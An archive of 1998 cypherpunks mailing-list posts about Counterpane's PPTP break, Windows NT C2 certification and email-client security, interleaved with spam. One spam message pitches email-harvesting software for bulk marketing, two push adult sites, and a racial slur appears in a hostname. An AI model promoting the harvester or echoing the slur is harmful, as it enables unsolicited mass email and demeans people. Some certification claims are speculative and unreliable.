surprised if NT could get close to this....

I am so looking forward to NT5, it should prove to be very entertaining and
perhaps a really good opportunity to educate the public.


OK, getting bored with this reply now, so here it goes, errors and all....


-Chris

P.S. How does M$ sidestep the ITAR with ipsec code in Win98/NT5?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Iain Collins" <icollins@scotland.net>
Date: Tue, 2 Jun 1998 08:20:43 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: RE: Counterpane Cracks MS's PPTP
In-Reply-To: <19980602152326.B32084@caffeine.ix.net.nz>
Message-ID: <002301bd8e39$c8b18880$c7f3b094@webadmin.sol.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


As reguards:

> Previous security foobars by M$:
>
> NT C2 <---- LOL!!!

I beleive that no operating system has ever been given a C2 certification,
and that only indiviual installations can be certifed.

This requries that each installation be transported and conducted under
armed guard, which is case with certain US government Microsoft NT
Workstation installations.

It is also stated (somewhere, but I don't have the details to hand) that no
C2 rated system should be plugged in to an external network connection (i.e.
the internet), and that only connections to secure LAN's/WAN's are permitted
(otherwise the C2 certification is meaningless, hence why NT Sever has never
been C2 certified IIRC).

I would be grateful if anyone can categorically deny or in any way support
this.

> Auto-Launch attached binaries in E-Mail <-- Can we say GoodTimes?

The GoodTimes virus was, according to the DOE's CAIC a hoax. This is also my
personal opinion. This is what DOE's CAIC have to say:
http://ciac.llnl.gov/ciac/CIACHoaxes.html#goodtimes
Or, more amusingly.
http://ciac.llnl.gov/ciac/CIACHoaxes.html#goodspoof

However All E-mail readers that support HTML & JavaScript/Java/Active-X are
inherantly insecure. This inlcudes Netscape Navigator and Microsoft Outlook,
where mearly the act of previewing a malicious message can cause adverse
effects.

If anyone were to include a embed a malicious Java or Active-X control then
the supposed sandbox in Windows 9X/NT would be ineffectual as one could
conceviably create a control which could execute software anywhere on the
hard disk (this has already been done using both Active-X and IE under
Windows 95). Thus it follows that it could determain what viewer it is being
read under and execute any other attachments in the same e-mail from where
the are stored (in Netscape/Outlook) which could then... <please complete
this sentence using your own words>

Iain Collins, icollins@sol.co.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dark Knight <DarkKnight@Elitehackers.org>
Date: Tue, 2 Jun 1998 17:42:52 -0700 (PDT)
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: WinNT C2?
In-Reply-To: <199806022355.SAA008.18@geiger.com>
Message-ID: <Pine.LNX.3.96.980602172921.21860A-100000@Nigger.EliteHackers.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >Windows NT4.0 has been tested under the red book spec published by the
> >NCSC. That means in effect, NT is C2 compliant in a stand alone
> >environment. Howver, NT does NOT comply with the orange book spec which
> >defines additional requirements when the machine is used in a networked
> >environment. It *IS* possible for an operating system that is on a
> >networked machine to be C2(Orange Book) compliant. Microsoft has never
> >stated that it is C2 compliant on a network, however their page about C2
> >and NT is poorly worded, and effectively discounts the importance of the
> >Orange Book spec.
Do you know the Redbook specs?  From my understanding of the specs to have
a C2 rateing you can't have a NIC card or Disk Drive.  But I think you can
have a NIC card in the machine connected to a network that is enrycpted
network.  But I could be wrong but I don't forget most of what I read.. 

> 
> >It would be fun to get ahold of the specs from the NCSC.
> 
> You have this backward,
> 
> The "Red Book": NCSC-TG-005 "Trusted Network Interpretation of the Trusted
> Computer System Evaluation Criteria"

> The "Orange Book": DOD 5200.28-STD "DOD Trusted Computer System Evaluation
> Criteria"
> 
> A NT machine to meet DOD 5200.28 C2 rating needs to be seriously crippled
> when comapired to normal operation. No removable media, No Modem, No
> Network Connection, hell pluging the dam thing and turning it on probably
> puts it's C2 rating in jepordy.
> 
> The reason M$ downplays their C2 rating is that in average day to day use
> of this OS it does not meet this rating.
> 
> NT has never had any RedBook rating and is not certified for use in a
> secure network.
MS is haveing problems meeting the standards and they have alot of work
to do on NT when it comes to Secuirty.  Any was see MSN.com today?

			|)ark |(night

DEFINITION.
Windows 95: n.   32 bit extensions and a graphical shell for a
16 bit patch to an 8 bit operating system originally coded for
a 4 bit microprocessor, written by a 2 bit company, that can't
stand 1 bit of competition.

Http://www.EliteHackers.org/DarkKnight






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Tue, 2 Jun 1998 16:31:53 -0700 (PDT)
To: Brad Kemp <kemp@indusriver.com>
Subject: Re: Counterpane Cracks MS's PPTP
In-Reply-To: <3.0.3.32.19980602090947.0317cc10@pop3.indusriver.com>
Message-ID: <Pine.SUN.3.91.980602151156.23889A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jun 1998, Brad Kemp wrote:

> It is possible to recover all the clear text from a PPTP session,
> even if most of the traffic is going in one direction only.
> The failure is in MPPE.  When MPPE gets a sequenceing error, it
> resets the key.  This causes the cipher stream to be reset.  It is
> partially covered in section 5.4.

	I really think the XOR weaknesses deserve as much publicity 
	as possible, because they are IMHO the simplest to exploit,
	and the result of the dumbest mistakes.

	So far we have three:  40-bit RC4 uses the same key with every 
	session (!!), the client and server seems to encrypt with the same
	key stream going both ways (!!!), and then this resequencing
	attack.

	Are all three of these fixed?  The certainly aren't 
	"theoretical." 

==-  Xcott Craver -- Caj@niu.edu -- http://www.math.niu.edu/~caj/  -==
"This is a different thing:  it's spontaneous and it's called 'wit.'"
                                                      -The Black Adder





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 2 Jun 1998 16:51:48 -0700 (PDT)
To: Jim Tatz <jtatz@chemistry.ohio-state.edu>
Subject: Re: WinNT C2?
In-Reply-To: <Pine.GSO.3.93.980602185641.27020B-100000@chemistry.mps.ohio-state.edu>
Message-ID: <199806022355.SAA008.18@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In
<Pine.GSO.3.93.980602185641.27020B-100000@chemistry.mps.ohio-state.edu>,
on 06/02/98 
   at 07:09 PM, Jim Tatz <jtatz@chemistry.ohio-state.edu> said:

>Windows NT4.0 has been tested under the red book spec published by the
>NCSC. That means in effect, NT is C2 compliant in a stand alone
>environment. Howver, NT does NOT comply with the orange book spec which
>defines additional requirements when the machine is used in a networked
>environment. It *IS* possible for an operating system that is on a
>networked machine to be C2(Orange Book) compliant. Microsoft has never
>stated that it is C2 compliant on a network, however their page about C2
>and NT is poorly worded, and effectively discounts the importance of the
>Orange Book spec.

>It would be fun to get ahold of the specs from the NCSC.

You have this backward,

The "Red Book": NCSC-TG-005 "Trusted Network Interpretation of the Trusted
Computer System Evaluation Criteria"

The "Orange Book": DOD 5200.28-STD "DOD Trusted Computer System Evaluation
Criteria"

A NT machine to meet DOD 5200.28 C2 rating needs to be seriously crippled
when comapired to normal operation. No removable media, No Modem, No
Network Connection, hell pluging the dam thing and turning it on probably
puts it's C2 rating in jepordy.

The reason M$ downplays their C2 rating is that in average day to day use
of this OS it does not meet this rating.

NT has never had any RedBook rating and is not certified for use in a
secure network.


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2 means...CURTAINS for Windows!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNXSQ/I9Co1n+aLhhAQH0/AQAmuhCSKG8mogzfbvq9x7Z90vghRWPOKzJ
4AMffpsPh4mpUnx6VHPLBksa4j3lyUh/67WwqozILzDna1fXfbYu/7eFsWltjw2n
yb1YQKOIhJU+SgbO5kSfakc3oGaKAXElmHDcdTWJdl+g6PShDTM6KXRPgqcMi55I
jfnqVPDKics=
=CPFu
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Tatz <jtatz@chemistry.ohio-state.edu>
Date: Tue, 2 Jun 1998 16:10:10 -0700 (PDT)
To: Iain Collins <icollins@scotland.net>
Subject: WinNT C2?
In-Reply-To: <002301bd8e39$c8b18880$c7f3b094@webadmin.sol.co.uk>
Message-ID: <Pine.GSO.3.93.980602185641.27020B-100000@chemistry.mps.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Windows NT4.0 has been tested under the red book spec published by the
NCSC. That means in effect, NT is C2 compliant in a stand alone
environment. Howver, NT does NOT comply with the orange book spec which
defines additional requirements when the machine is used in a networked
environment. It *IS* possible for an operating system that is on a
networked machine to be C2(Orange Book) compliant. Microsoft has never
stated that it is C2 compliant on a network, however their page about C2
and NT is poorly worded, and effectively discounts the importance of the
Orange Book spec.

It would be fun to get ahold of the specs from the NCSC.

-Jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Wedgwood <chris@cybernet.co.nz>
Date: Tue, 2 Jun 1998 00:17:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Counterpane Cracks MS's PPTP
In-Reply-To: <e01acc58.35737d7c@aol.com>
Message-ID: <19980602191625.A14758@caffeine.ix.net.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, Jun 02, 1998 at 12:20:11AM -0400, StanSqncrs@aol.com wrote:
> In a message dated 6/1/98 10:38:20 PM Central Daylight Time,
> chris@cybernet.co.nz writes:
> 
> << > Auto-Launch attached binaries in E-Mail <-- Can we say GoodTimes?
>  
>  Can anyone confirm that this has indeed been fixed yet? >>
> 
> It was my understanding, that the so-called GoodTimes virus was a farce,
> apparently aimed at specific commercial spammers.

GoodTimes is a hoax.

I'm talking about a bug in Outlook (Express?) that will execute code when
email messages are opened.



-Chris




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: q772d3 <q772d3@att.net>
Date: Tue, 2 Jun 1998 19:31:51 -0700 (PDT)
To: <cybrid@hierhin.de>
Subject: No Subject
Message-ID: <19943672.886214@relay.comanche.denmark.eu>
MIME-Version: 1.0
Content-Type: text/plain


Authenticated sender is <q772d3@att.net>
Subject:  q 77
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

EMAIL MARKETING WORKS!!

Bull's Eye Gold is the PREMIER email address collection tool.
This program allows you to develop TARGETED lists of email
addresses.  Doctors, florists, MLM, biz opp,...you can collect
anything...you are only limited by your imagination!  You can
even collect email addresses for specific states, cities, and
even countries!  All you need is your web browser and this program.
Our software utilizes the latest in search technology called
"spidering". By simply feeding the spider program a starting
website it will collect for hours. The spider will go from website
to targeted website providing you with thousands upon thousands of
fresh TARGETED email addresses. When you are done collecting,  the
spider removes duplicates and saves the email list in a ready to
send format. No longer is it necessary to send millions of ads to
get a handful of responses...SEND LESS...EARN MORE!!!

A terrific aspect of the Bull's Eye software is that there is
no difficult set up involved and no special technical mumbo-jumbo
to learn. All you need to know is how to search for your targeted
market in one of the many search engines and let the spider do the
rest! Not familiar with the search engines? No problem, we provide
you with a list of all the top search engines. Just surf to the
location of a search engine on your browser then search for the
market you wish to reach...it's that easy!

For instance if you were looking for email addresses of Doctors
in New York all you would do is:

1) Do a search using your favorite search engine by typing in
the words doctor(s) and New York
2) Copy the URL (one or more)...that's the stuff after the
http://...  for instance it might look like
http://www.yahoo.com/?doctor(s)/?New+York
3) Press the START button

THAT's IT!!!  The Bull's Eye spider will go to all the websites
that are linked, automatically extracting the email addresses
you want.

The spider is passive too! That means you can let it run all
day or all night while you are working on important things or
just having fun on your computer. There is no need to keep a
constant watch on it, just feed it your target market and give
it praise when it delivers thousands of email addresses at
the end of the day!

Features of the Bull's Eye Software:

* Does TARGETED searches of websites collecting the email
  addresses you want!
* Collects Email addresses by City, State, even specific
  Countries
* Runs Automatically...simply enter the Starting information,
  press The Start Button, and it does the rest
* Filters out duplicates
* Keeps track of URLs already visited
* Can run 24 hours per day, 7 days per week
* Fast and Easy List Management
* Also has built in filtering options...you can put in words
  that it "Must" have while searching,...you can even put in
  criteria that it  "Must NOT Have"...giving you added flexibility
* Also imports email addresses from any kind of files (text
  files, binary files, database files)
* List editor handles Multiple files to work on many lists
  simultaneously
* Has a Black-Book feature... avoid sending emails to people
  who do not want to receive it
* Built-in Mail program...send email directly on the internet
  with just a click of your mouse
* Personalized Emails...if the email address has the user's
  name when it is collected,..you can send Personalized emails!!!
* Sort by Location, Server, User Name, Contact Name
* Advanced Operations:
 Email address lists export in many different formats
  (HTML, Comma delimited, text file)
 Advanced editing...Transfer, Copy,  Addition, Delete, Crop,
  Move to Top/Bottom
 Operations between lists...Union, Subtraction, Comparison
* Program is Passive,...meaning you can run other programs at
  the same time

CALL FOR MORE INFORMATION   213-980-7850
CALL FOR MORE INFORMATION   213-980-7850

ORDERING INFORMATION

Customer Name
Company Name
Address
City
State                       Zip
Phone                                       Fax
Email Address

______ BULL'S EYE SOFTWARE   $259.00
Includes Software, Instructions, Technical Support

______ Shipping & Handling  (2-3 Day Fedex)  $10.00
                           (Fedex Overnite) $20.00

______  TOTAL
                 (CA Residents add applicable sales tax)

*All orders are for Win 95 and Win NT

                *****CREDIT CARDS ACCEPTED*****
                   MASTERCARD   VISA   AMEX

   PLEASE CALL 213-980-7850 to process your order
                        9am-5pm Pacific Time
                Checks or Money Orders send to:
                      WorldTouch Network Inc.
5670 Wilshire Blvd.  Suite 2170 Los Angeles, CA 90036
Please note:  Allow 5 business days for all checks to
clear before order is shipped.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Tue, 2 Jun 1998 16:54:58 -0700 (PDT)
To: Jim Tatz <jtatz@chemistry.ohio-state.edu>
Subject: Re: WinNT C2?
In-Reply-To: <Pine.GSO.3.93.980602185641.27020B-100000@chemistry.mps.ohio-state.edu>
Message-ID: <Pine.GSO.3.96.980602194431.14873K-100000@pawn.michonline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jun 1998, Jim Tatz wrote:

> 
> Windows NT4.0 has been tested under the red book spec published by the
> NCSC. That means in effect, NT is C2 compliant in a stand alone
> environment. Howver, NT does NOT comply with the orange book spec which
> defines additional requirements when the machine is used in a networked
> environment. It *IS* possible for an operating system that is on a
> networked machine to be C2(Orange Book) compliant. Microsoft has never
> stated that it is C2 compliant on a network, however their page about C2
> and NT is poorly worded, and effectively discounts the importance of the
> Orange Book spec.
> 
> It would be fun to get ahold of the specs from the NCSC.

I believe you've got your colors backwards here..

NT is C2 compliant in standalone format, with Posix disabled.  It's an
unusable configuration.  That's all I can remember off the top of my head
though..

Ryan Anderson 
PGP fp: 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Tatz <jtatz@chemistry.ohio-state.edu>
Date: Tue, 2 Jun 1998 17:14:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: WinNT C2?
In-Reply-To: <199806022355.SAA008.18@geiger.com>
Message-ID: <Pine.GSO.3.93.980602200540.28995A-100000@chemistry.mps.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


> A NT machine to meet DOD 5200.28 C2 rating needs to be seriously crippled
> when comapired to normal operation. No removable media, No Modem, No
> Network Connection, hell pluging the dam thing and turning it on probably
> puts it's C2 rating in jepordy.
> 
> The reason M$ downplays their C2 rating is that in average day to day use
> of this OS it does not meet this rating.
> 
> NT has never had any RedBook rating and is not certified for use in a
> secure network.

In addition to the converstaion, MS says:
Microsoft has opted not to include certain components of Windows NT in the
evaluation process, not because they would not pass the evaluation, but to
save time by reducing the load on the NSA. Additionally, the
MS-DOS/Windows on Windows (WOW) system may be treated as a Win32
application and would therefore not need to be evaluated as part of the
Trusted Computer Base (TCB). Networking on NT may not have to go
through the "Red Book," or "Trusted Network Interpretation." It may be
enough to consider networking to be another subsystem, and therefore only
the Orange Book would apply. New or modified components and other hardware
platforms can go through a "RAMP" process to be included in the evaluation
at a later time. 

http://support.microsoft.com/support/kb/articles/q93/3/62.asp
[Isn't it great, you have to register for FREE support?]

-Jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 2 Jun 1998 18:22:02 -0700 (PDT)
To: Jim Tatz <jtatz@chemistry.ohio-state.edu>
Subject: Re: WinNT C2?
In-Reply-To: <Pine.GSO.3.93.980602200540.28995A-100000@chemistry.mps.ohio-state.edu>
Message-ID: <199806030125.UAA009.35@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In
<Pine.GSO.3.93.980602200540.28995A-100000@chemistry.mps.ohio-state.edu>,
on 06/02/98 
   at 08:14 PM, Jim Tatz <jtatz@chemistry.ohio-state.edu> said:

>In addition to the converstaion, MS says:
>Microsoft has opted not to include certain components of Windows NT in
>the evaluation process, not because they would not pass the evaluation,
>but to save time by reducing the load on the NSA. Additionally, the
>MS-DOS/Windows on Windows (WOW) system may be treated as a Win32
>application and would therefore not need to be evaluated as part of the
>Trusted Computer Base (TCB). Networking on NT may not have to go through
>the "Red Book," or "Trusted Network Interpretation." It may be enough to
>consider networking to be another subsystem, and therefore only the
>Orange Book would apply. New or modified components and other hardware
>platforms can go through a "RAMP" process to be included in the
>evaluation at a later time. 


Good God what kind of double talk is this? It doesn't need Red Book eval.
and networking can be treated as a sub-system?!? Well I guess the guys
down at NSA just wrote the Red Book (which is significantly larger than
the Orange Book) because they were board.

I would not trust Micky$lop to tell me that the sky was blue and water was
wet let alone trust them to provide *any* form of security product.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Get OS/2 - the best Windows tip around!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNXSmHI9Co1n+aLhhAQEdowP9FsXmZOEk8KMKvgVun8wbMQqIUoGjB3wj
e+dXsPglA/ya2S2+/wwdQFW2UEXvqHYR4MNV8Af/jqnxQgOk//4ZJVUrf+dkd65u
dOfa2eICbFyRg8OgZZgWDXFr1IvgLpcS36U0V+LyebaoyCqI/WsMnx6zcx8qEzHs
iiF7kDJJPmE=
=HBxD
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 2 Jun 1998 18:46:20 -0700 (PDT)
To: Dark Knight <DarkKnight@Elitehackers.org>
Subject: Re: WinNT C2?
In-Reply-To: <Pine.LNX.3.96.980602172921.21860A-100000@Nigger.EliteHackers.org>
Message-ID: <199806030150.UAA009.49@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <Pine.LNX.3.96.980602172921.21860A-100000@Nigger.EliteHackers.org>, on
06/02/98 
   at 12:35 PM, Dark Knight <DarkKnight@EliteHackers.org> said:

>Do you know the Redbook specs?  From my understanding of the specs to
>have a C2 rateing you can't have a NIC card or Disk Drive.  But I think
>you can have a NIC card in the machine connected to a network that is
>enrycpted network.  But I could be wrong but I don't forget most of what
>I read.. 

You are making the same mistake the previous poster made on this.

Orange Book == Standalone
Red Book    == Network

The numerious criteria for the various levels of trusted systems are too
numerious to list here. I *strongly* recomend obtaining copies of the
Rainbow Series from the NSA (they will mail a copy for free) and studying
the documentation. They are well written and easy to read (unlike many
such papers which are techno-bable filled).

There are aprox. 30 manuals in the Rainbow Series that cover a wide range
of topics related to Trusted Systems of which the Orange Book is a small
part. I doubt you could find more than 5 M$ employees that have read more
than a quarter of the manuals let alone are able to implement their
principals. 

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: I love running Windows! NOT!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNXSr2Y9Co1n+aLhhAQGtDAQApkDb/TiweTEuMnijTqOVcwcFuqQGKh/7
wZjiBu6S+VcyVUj/dcTyUwszqD1vuBUuevD8W9+dGdqjxRz/P8nxYelqaZfza997
sraI5Wc3MjGxp64plbRAt6qOzZjfFCXOv/ZSuRrf9tXjHFJeZz0KSkNex3Haz54j
zmxljrbnmB8=
=J5Mg
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dark Knight <DarkKnight@Elitehackers.org>
Date: Tue, 2 Jun 1998 21:32:09 -0700 (PDT)
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: WinNT C2?
In-Reply-To: <199806030150.UAA009.49@geiger.com>
Message-ID: <Pine.LNX.3.96.980602212329.22682B-100000@Nigger.EliteHackers.org>
MIME-Version: 1.0
Content-Type: text/plain


> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In <Pine.LNX.3.96.980602172921.21860A-100000@Nigger.EliteHackers.org>, on
> 06/02/98 
>    at 12:35 PM, Dark Knight <DarkKnight@EliteHackers.org> said:
> 
> >Do you know the Redbook specs?  From my understanding of the specs to
> >have a C2 rateing you can't have a NIC card or Disk Drive.  But I think
> >you can have a NIC card in the machine connected to a network that is
> >enrycpted network.  But I could be wrong but I don't forget most of what
> >I read.. 
> 
> You are making the same mistake the previous poster made on this.
> 
> Orange Book == Standalone
> Red Book    == Network
> 
> The numerious criteria for the various levels of trusted systems are too
> numerious to list here. I *strongly* recomend obtaining copies of the
> Rainbow Series from the NSA (they will mail a copy for free) and studying
> the documentation. They are well written and easy to read (unlike many
> such papers which are techno-bable filled).
> 
> There are aprox. 30 manuals in the Rainbow Series that cover a wide range
> of topics related to Trusted Systems of which the Orange Book is a small
> part. I doubt you could find more than 5 M$ employees that have read more
> than a quarter of the manuals let alone are able to implement their
> principals. 
I had a copy but like a dumb ass I forgot them where I used to live.  I
don't think the NSA or DOD I think it's the NSA gives away free copys any
more.. 

			|)ark |(night

DEFINITION.
Windows 95: n.   32 bit extensions and a graphical shell for a
16 bit patch to an 8 bit operating system originally coded for
a 4 bit microprocessor, written by a 2 bit company, that can't
stand 1 bit of competition.

Http://www.EliteHackers.org/DarkKnight






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Wedgwood <chris@cybernet.co.nz>
Date: Tue, 2 Jun 1998 04:16:03 -0700 (PDT)
To: Alan <alan@ctrl-alt-del.com>
Subject: Re: Counterpane Cracks MS's PPTP
In-Reply-To: <199806012143.QAA018.23@geiger.com>
Message-ID: <19980602231500.A532@caffeine.ix.net.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, Jun 01, 1998 at 10:03:43PM -0700, Alan wrote:

> >That said, C2 doesn't necessarily buy you all that much.
> 
> Is this not what they claimed when they sold NT to the Air Force?  Judging
> by some of the Air Force software I have seen, this frightens me more than
> most things.

Either M$ lied, or the Air Force should no better. In the former, the Air
Force should sue M$, but more likely its the latter. Why should the Air
Force have clue-full people when most large corporates, banks, governments,
IT companies and software companies do not?

Governments with large databases full of all your personal details and banks
with all your financial details are two really good examples of
organizations which should do a good job with system security and
reliability but invariably do the worst (some exceptions apply).

> >Sure it sucks, it sucks for lots of reasons. But for the average luser it
> >still better than plugins so thats why its taken off. And what make
> >downloading a plugin and installing that any better?
> 
> You have a little more control over plug-ins.

It doesn't really buy much. Most people will blindly download anything and
install it. If it doesn't install the first time by finding all the right
file locations, etc. and allowing the use to click Next every time, they
will start deleting files at random trying to remove it.

Perhaps I'm over stating things, but I'm a tad jaded from having to make
documentation and software work for morons (the public at large).

> But those are specific to the client.  Most Unix users know better.

The M$ example is confined to a specific client. Many unix users use unix
because they are required too, these people are probably as clue-less and
luse95 users.

On average the number of clue-full 95 users against the number of clue-full
unix users is probably 10:1 despite luse95 large user base, quoting numbers
which I just made up of course and clue-full being defined by me, and able
to be redefined whenever I feel like it.

This is all beside the point - someone mentioned that a M$ mailer had a very
nasty bug, I just pointed out that can and has also occurred elsewhere.

> >Does anyone have a list of design and implementation flaws for CAPI? I've
> >had discussions with a couple of people about these, but never seen
> >anything published.
> 
> I know of one, but I cannot release details yet.  (I did not discover it
> and i need to wait until the non-beta version of the product is released.)
> Besides, I have been told I will be killed if I reveal it before it is
> time.

It can wait. It seems plenty of others are waiting.... 
 
> >Yeah... its crap, but not necessarily that much worse that some of the
> >others out there. If someone were keeping score on which stacks help up
> >the best against all the attacks of the last two years it probably
> >wouldn't be the worst.
> 
> A great deal of this blame can be placed on the WinSock spec.  The spec
> was quite "loose" in many details of the implementation.  You could be
> complient and still not be able to deal with much of the software out
> there.  

The issues most people complain about are not related to the WinSock API,
but poor coding in the stack that make stack overflows and memory buffer
curruption trivial. Similar bugs used to exist in the *BSD and linux stacks,
as with the streams library used by SCO and Solaris (although maybe solaris
has something funny there).

> My vote for bad PC stack of the century was the one put out by Sun.
> Not even close to compatible...

No, my shit-stack-off-the-week (I just decided now) goes to Ultrix stack
which barfs on unknown tcp options and hence is complete fucked when tying
to comminicate with a recent *BSD or linux boxes, solaris and possible
Win98/NT5.

> Sturgeon's law applies to people as well...

?

Sorry... don't know it.
 
> >People need to be educated about important issues, and using lots of
> >complicated gobbledygook doesn't help. If you, like me, have a loved one
> >that isn't terribly interested in computers or encryption, then see if
> >the phrase 'modular exponentiation' doesn't kick there
> >eye-glaze-secreting gland into over drive.
> 
> Most everything involving computers tends to do that.

Only because people are fed bullshit and lies by 80% of the industry
'consultants' who don't know much and use big words to cover this up.

I really think people would be much more willing if they weren't feed so
much crap at times.

> You can type it out in clear, short sentences and the media will still
> screw it up.  If you have no clue as to what you are writing about, the
> accuracy of what you write will suffer.

Again, the above applies, but bear in mind that most people in the modern
media have little interest in the truth unless it helps sales, and if not
then just 'modify the story a bit'. 

It also helps to consider that most reporters are pretty dumb and lack any
real qualifications to talk about the things that they do, PC rag. editors
being a really good example.


Lets face it, we use the 'net and crypto, so we are dirty filthy prevented
peadophile unabomber criminals who are going to pervert the youth and
corrupt the America way. If you deny this it just proves what an
untrustworthy person you are.

> Multi-user NT is available now. Citrix and NCD both have versions out now.
> (Both are based on NT 3.51. They would have released a 4.0 product long
> ago, but Microsoft wanted the product for themselves.) The server load
> seems to be about 50 users per box. Depends on what you are running.

Slightly different that NT5 though... I know people working on large Citrix
boxes with 2GB of ram and they speak quite highly of it, but their 40+ users
are running custom apps. with an NT4 like gui.

I'm not so sure it would work so great with 10+ people running Visual C++ to
compile and debug code.... where as unix boxen have been doing this for
years with 500+ people.

What really sucks is there is some nice ideas in bits of NT, only what
little kewl stuff there is has lost all credibility because of the
atrociously large bloated buggy code that constitutes the other 99% of it.

> Assuming that they can be educated.  Better to offer them a choice.  It is
> hard to say "X is bad" unless you have an alternative.

The real shame in all this is there is no really viable choice to the evil
borg. Not yet anyhow....



-Chris




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimmy@weboneinc.net
Date: Tue, 2 Jun 1998 20:29:48 -0700 (PDT)
To: cypherpunks@toad.com
Subject: $25.00 Signup!
Message-ID: <199806030329.XAA32240@josh1.weboneinc.com>
MIME-Version: 1.0
Content-Type: text/plain


This message is intended for Adult Webmasters only. We are sorry if you
received this message in error.  Just type remove and put your e-mail
address on the subject line.
Thank you for your consideration.


Hello,

Earn $25.00 per signup!
XTV- 2000's adult webmaster referral program pays you $25.00
for every person that signs up on our site!  You get paid more than any
other program!

We have the hottest online hardcore videos and spy-cams that everyone wants
to see, so it will be easy to make money with our high commisions.
Real time stats, bi-monthly payout,  and all other details are on the
sign-up page:

http://208.156.131.103/xtv

Sign-up and start making money right now!

Thanks,
Jim Stevenson
VP Marketing
XTV-2000
jimmy@weboneinc.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: samantha21@worldnet.att.net
Date: Tue, 2 Jun 1998 21:53:36 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Lunch...
Message-ID: <199806030453.AAA18564@spruce.libertynet.org>
MIME-Version: 1.0
Content-Type: text/plain



The Best Adults Only Website I've Seen!

       This one has EVERYTHING!

              Take a Look

CLICK ONCE





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Tatz <jtatz@chemistry.ohio-state.edu>
Date: Tue, 2 Jun 1998 23:05:48 -0700 (PDT)
To: Andrew White <awhite@indigo.ie>
Subject: Re: WinNT C2? - How about WinNT and some C-4?
In-Reply-To: <008e01bd8ead$5cdc4db0$0100007f@localhost>
Message-ID: <Pine.GSO.3.93.980603020142.5235B-100000@chemistry.mps.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


> NT 4.0 has never passed ANY security evaluation. NT 3.51 passed a UK one in
> October 1996, NT 3.5 passed C2 in
> 1995. Both these earlier versions are effectively unusable due to diverse
> and numerous bugs unrelated to security,
> and both the evaulations were without a network card.

Surprisingly enough NT4.0 has not received the C2 rating, although I could
have sworn I have seen remarks about Nt4.0 and C2 certification on a
Microsoft page. According to WIRED, NT 4.0 is undergoing testing, and will
supposedly be certified in Oct.

